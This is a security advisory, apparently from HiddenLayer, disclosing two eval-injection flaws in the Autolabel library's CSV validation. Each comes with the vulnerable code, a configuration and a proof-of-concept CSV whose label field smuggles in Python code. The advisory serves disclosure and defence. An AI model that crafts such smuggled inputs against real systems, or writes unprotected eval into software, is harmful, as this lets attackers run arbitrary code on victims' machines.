HiddenLayer is the leading provider of Security for AI. Its security platform helps enterprises safeguard the machine learning models behind their most important products. HiddenLayer is the only company to offer turnkey security for AI that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Founded by a team with deep roots in security and ML, HiddenLayer aims to protect enterprise’s AI from inference, bypass, extraction attacks, and model theft. The company is backed by a group of strategic investors, including M12, Microsoft’s Venture Fund, Moore Strategic Ventures, Booz Allen Ventures, IBM Ventures, and Capital One Ventures.
September 12, 2024
Eval on CSV data allows arbitrary code execution in the ClassificationTaskValidate class
CVE Number
CVE-2024-27320
Summary
An arbitrary code execution vulnerability exists inside the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file. The vulnerability requires the victim to load a malicious CSV dataset with the optional parameter ‘validate’ set to True while using a specific configuration. The vulnerability allows an attacker to run arbitrary Python code on the machine the CSV file is loaded on because of the use of an unprotected eval function.
Products Impacted
This vulnerability is present in Autolabel v0.0.8 and newer.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’)
Details
To exploit this vulnerability, an attacker would create a malicious CSV file and share this as a dataset with the victim, who would load it for a classification task using AutoLabel. The vulnerability exists in the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file (shown below).
def validate(self, value: str):
"""Validate classification
A classification label(ground_truth) could either be a list or string
"""
# TODO: This can be made better
if value.startswith("[") and value.endswith("]"):
try:
seed_labels = eval(value)
if not isinstance(seed_labels, list):
raise
unmatched_label = set(seed_labels) - self.labels_set
if len(unmatched_label) != 0:
raise ValueError(
f"labels: '{unmatched_label}' not in prompt/labels provided in config "
)
except SyntaxError:
raise
else:
if value not in self.labels_set:
raise ValueError(
f"labels: '{value}' not in prompt/labels provided in config "
)
When the user loads the malicious CSV file, the contents of the label_column value in each row are passed to the validate function of the class set with the task_type attribute. If the arguments are wrapped in brackets “[]”, they are passed into an eval function in the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file. This allows arbitrary code execution on the victim’s device. An example of a configuration and an example of a malicious CSV are shown below.
from autolabel import AutolabelDataset
config = {
"task_name": "ToxicCommentClassification",
"task_type": "classification", # classification task
"dataset": {
"label_column": "label",
},
"model": {
"provider": "openai",
"name": "gpt-3.5-turbo" # the model we want to use
},
"prompt": {
# very simple instructions for the LLM
"task_guidelines": "Does the provided comment contain 'toxic' language? Say toxic or not toxic.",
"labels": [ # list of labels to choose from
"label",
"not toxic"
],
"example_template": "Text Snippet: {example}\nClassification: {label}\n{label}"
}
}
AutolabelDataset('example.csv', config, validate=True)
example_config.py
example,label
hello,[print('\n\n\ncode execution\n\n\n') for a in ['a']]
example.csv
Eval on CSV data allows arbitrary code execution in the MLCTaskValidate class
CVE Number
CVE-2024-27321
Summary
An arbitrary code execution vulnerability exists inside the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py Python file. The vulnerability requires the victim to load a malicious CSV dataset with the optional parameter ‘validate’ set to True while using a specific configuration. The vulnerability allows an attacker to run arbitrary Python code on the program’s machine because of the use of an unprotected eval function.
Products Impacted
This vulnerability is present in Autolabel v0.0.8 and newer.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’)
Details
To exploit this vulnerability, an attacker would create a malicious CSV file and share the dataset with the victim to load it for a multilabel classification task using Autolabel. The vulnerability exists in the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py Python file.
def validate(self, value: str):
if value.startswith("[") and value.endswith("]"):
try:
seed_labels = eval(value)
if not isinstance(seed_labels, list):
raise ValueError(
f"value: '{value}' is not a list of labels as expected"
)
unmatched_label = set(seed_labels) - self.labels_set
if len(unmatched_label) != 0:
raise ValueError(
f"labels: '{unmatched_label}' not in prompt/labels provided in config "
)
except SyntaxError:
raise
else:
# TODO: split by delimiter specified in config and validate each label
pass
When the user loads the malicious CSV file, the contents of the label_column value in each row are passed to the validate function of the class set with the task_type attribute. If the arguments are wrapped in brackets “[]”, they are passed into an eval function in the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file. This allows arbitrary code execution on the victim’s device. An example configuration and an example of a malicious CSV are shown below:
from autolabel import AutolabelDataset
config = {
"task_name": "ToxicCommentClassification",
"task_type": "multilabel_classification", # classification task
"dataset": {
"label_column": "label",
},
"model": {
"provider": "openai",
"name": "gpt-3.5-turbo" # the model we want to use
},
"prompt": {
# very simple instructions for the LLM
"task_guidelines": "Does the provided comment contain 'toxic' language? Say toxic or not toxic.",
"labels": [ # list of labels to choose from
"label",
"not toxic"
],
"example_template": "Text Snippet: {example}\nClassification: {label}\n{label}"
}
}
AutolabelDataset('example.csv', config, validate=True)
example_config.py
example,label
hello,[print('\n\n\ncode execution\n\n\n') for a in ['a']]
example.csv
Timeline
July, 8 2024 — Reached out to multiple administrators through their communication channel
September, 6 2024 — Final attempt to reach out to vendor prior to public disclosure date
September, 12 2024 — Public disclosure